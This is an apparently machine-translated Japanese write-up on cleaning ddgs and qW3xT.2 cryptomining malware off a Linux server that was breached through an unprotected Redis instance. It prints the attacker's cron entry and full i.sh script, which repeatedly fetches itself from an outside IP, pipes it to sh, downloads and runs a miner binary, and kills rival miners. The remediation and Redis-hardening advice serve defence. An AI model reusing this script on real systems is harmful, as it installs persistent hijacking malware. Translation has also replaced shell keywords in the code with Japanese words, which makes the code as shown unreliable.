Linux サーバーに埋め込まれた ddgs および qW3xT.2 マイニング ウイルスの対処の実践記録

Linux サーバーに埋め込まれた ddgs および qW3xT.2 マイニング ウイルスの対処の実践記録

序文

仮想通貨の狂気的な投機により、マイニングウイルスは犯罪者が最も頻繁に使用する攻撃方法の 1 つになりました。ウイルス拡散者は、パソコンやサーバーを使用してマイニングを行う可能性があります。具体的な現象としては、コンピューターの CPU 使用率が高くなる、C ドライブの空き容量が急激に減少する、コンピューターの温度が上昇する、ファンの騒音が増加するなどの問題があります。

この記事では、Linuxに埋め込まれたDDGSとqW3xT.2マイニングウイルスの処理方法を主に紹介します。詳細な紹介を見てみましょう。

侵略後の現象:

2 つの異常なプロセス (qW3xT.2 と ddgs) が見つかりました。これらのプロセスは CPU を大量に消費し、強制終了された後しばらくして再び現れました。

これら 2 つの異常なプロセスを終了した後、しばらくすると次のプロセスが見られました。

まず、/etc/sysconfig/crotnab 内のスケジュールされたタスクでスケジュールされたスクリプトが見つからなかったため、crontab -e を入力してスケジュールされたタスクを見つけました。

*/5 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh
<span style="font-size: 15px;">149.56.106.215 が米国内にあることを確認しました。i.sh スクリプトの内容は次のとおりです。</span>
エクスポート PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
エコー "" > /var/spool/cron/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root
echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/crontabs/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
ps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013
if [ ! -f "/tmp/ddgs.3013" ]; then
 wget -q http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -O /tmp/ddgs.3013
 curl -fsSL http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -o /tmp/ddgs.3013
フィ
chmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013

ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill

治療方法:

1. crontab -eを削除する

*/5 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh

2. ハッカーが/root/.ssh/authorized_keysに設定したパスワードなしのログインコンテンツをクリアする

3. Redisのパスワードを変更する

4. ルートとログインアカウントのパスワードを変更する

安全のヒント:

1. Redisサーバーに接続できるIPを制限するためのbindオプションを設定し、Redisのデフォルトポート6379を変更し、認証、つまりAUTHを設定し、パスワードを設定します。パスワードはRedis設定ファイルにプレーンテキストで保存されます。

2. 名前変更コマンドの設定項目「RENAME_CONFIG」を設定すると、不正アクセスがあった場合でも、攻撃者がconfigコマンドを使用するのが難しくなります。

3. ファイアウォールでRedisの外部ネットワークをブロックできる場合

侵入方法:

関連情報を収集した結果、ハッカーは Redis の脆弱性を利用して侵入したことが判明しました。パスワードが設定されていなかったか、パスワードが単純すぎたのです。具体的な方法については、

https://www.jb51.net/article/147375.htm

reids パスワードの変更方法は次のとおりです。

redis-cli -h 127.0.0.1 -p 6379
config get requirepass ##現在のパスワードを取得します。 config set requirepass "yourpassword" ##現在のパスワードを設定します。サービスが再起動されると、デフォルト、つまりパスワードなしに設定されます。

永続的にするには、redis 構成ファイル redis.conf を開き、requirepass 値を見つけて、次のようにパスワードを変更します。

requirepass yourpassword ##行の前にスペースを入れないでください

要約する

上記はこの記事の全内容です。この記事の内容が皆さんの勉強や仕事に一定の参考学習価値を持つことを願っています。ご質問があれば、メッセージを残してコミュニケーションしてください。123WORDPRESS.COM を応援していただきありがとうございます。

以下もご興味があるかもしれません:
  • バッチ処理でポート135、137、445などを閉じる実装コード(ランサムウェアウイルス)
  • VBS スクリプトウイルスのウイルス原理の分析
  • PHP ウェブウイルス除去クラス
  • VC によって実装されたウイルスキラーツールの完全な例
  • DOSコマンドを使用してUSBウイルスと戦い、USBデータを保護する
  • USB ディスクウイルスを駆除する自家製バッチコード
  • C ウイルスプログラムの原理分析 (ウイルスを防ぐための C 言語の小さなウイルスの例)
  • 分析: 悪意のあるウイルスコードが挿入されたSQL文をクリアする
  • 自動実行ウイルス除去ツール bat コード
  • VBS.Runauto スクリプトウイルス分析
  • ウイルスがよく使用するVBSコード
  • Notepad.exe ウイルスを検出して駆除する方法
  • 美容ゲームウイルス iwbkvd.exe を検出して駆除する方法
  • バッチ自動実行ウイルス除去ツール
  • ルートキットウイルスソリューション

<<:  MySQL の大きなデータ テーブルにフィールドを追加する方法

>>:  SQL GROUP BYの詳細な説明と簡単な例

推薦する

ウェブ画像のホットリンクと座標値を設定するサンプルコード

時には、画像上に複数の領域を設定する必要があります。マウスで画像のさまざまな領域をクリックしてさまざ...

crontab スケジュールされたタスクが実行されない理由の分析と解決

序文Linux のスケジュールされたタスクを実装する方法としては、cron、anacron、at な...

Mysql クラシック高レベル/コマンドライン操作 (クイック) (推奨)

サーバーとデータベースの構築方法を学ぶ必要があるため、最近は SQL 言語を独学で学び始めました。デ...

CocosCreator Huarongdaoデジタルパズルの詳しい説明

目次序文文章1. パネル2. 華容島ソリューション3. コード4. 注記序文華容路とは何ですか? 誰...

Vueプロジェクトでvuexを使用する方法

目次Vuex とは何ですか? Vuex 使用サイクル図私のストアディレクトリvuexの例の実装要約す...

Linux で削除できないファイル/フォルダの解決方法

序文最近、弊社のサーバーがハッカーの攻撃を受け、一部のファイルの属性が変更されたため、ウイルスファイ...

CSS3 transition-delay属性のデフォルト値が単位なしの0であり無効である問題を解決します

今日は、CSS3 の transition-delay 属性のデフォルト値 0 に単位がないのは無効...

MySQL 8.0.22 のインストールと設定方法のグラフィックチュートリアル

この記事ではMySQL 8.0.22のインストールと設定について記録します。具体的な内容は以下のとお...

MySQL 最適化 query_cache_limit パラメータの説明

クエリキャッシュ制限query_cache_limit は、単一のクエリで使用できるバッファ サイズ...

HTMLコードに基づく画像断片化読み込み機能の実装

今日は断片化された画像の読み込み効果を実装します。効果は次のとおりです。 これを 3 つのステップで...

Ubuntu 19でdockerソースをインストールできない問題を共有する

主要な Web サイトと個人的な習慣に従って、Docker ソースを追加するには次の方法を使用します...

CSSは座席選択効果を実現するためにautoflow属性を使用する

1. 自動フロー属性、要素コンテンツの長さと幅が要素自体の長さと幅を超える場合、スクロールバーが表示...

CSS3は、欠けた角の長方形、折り畳まれた角の長方形、欠けた角の境界線を実装しています。

序文数日前、偶然、コーナーの四角形が欠落している機能に遭遇しました。最初に頭に浮かんだのは、必要な場...

dockerコンテナがIP経由でホストマシンにアクセスできない問題を解決する方法の詳細な説明

問題の起源docker を使用する場合、残念ながら docker コンテナ内のホストのポート 80 ...

CSSの使用に関する深い理解 clear:both

clear:both清除浮動これは私が常に持っていた印象ですが、私はこれをめったに使用せず、私の理...